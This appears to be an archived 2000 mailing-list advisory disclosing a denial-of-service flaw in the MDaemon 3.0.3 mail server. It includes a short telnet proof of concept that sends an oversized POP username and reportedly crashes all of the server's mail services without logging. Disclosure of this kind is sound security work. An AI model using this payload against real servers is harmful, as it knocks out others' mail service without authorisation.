OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Deerfield Communications MDaemon Mail Server DoS
From: cassiusHUSHMAIL.COM
Date: Wed May 24 2000 - 13:26:29 CDT


Deerfield Communications (the Wingate perpetrators) MDaemon POP server is
vulnerable to bigass usernames causing a DoS. MDaemon is a mail server
package for 95,98,NT and Win2k. Many systems that run Deerfield's World
Client web-mail also use MDaemon.

Exploit tested on Win2kpro running MDaemon 3.0.3

telnet example.com 110
+OK example.com POP service ready [1] using MDaemon v3.0.3 R
user ................(x256 more or less but 256 does the trick)
pass b00m!

This kills MDaemon and all of it's servers (POP3, IMAP, SMTP)
Nothing is logged. Event viewer says the service has terminated unexpectedly.
With proper research an overflow attack might be possible but I couldn't
find any access violations.
Vendor has been copied this message. Not much else to say.

-Cassius

IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.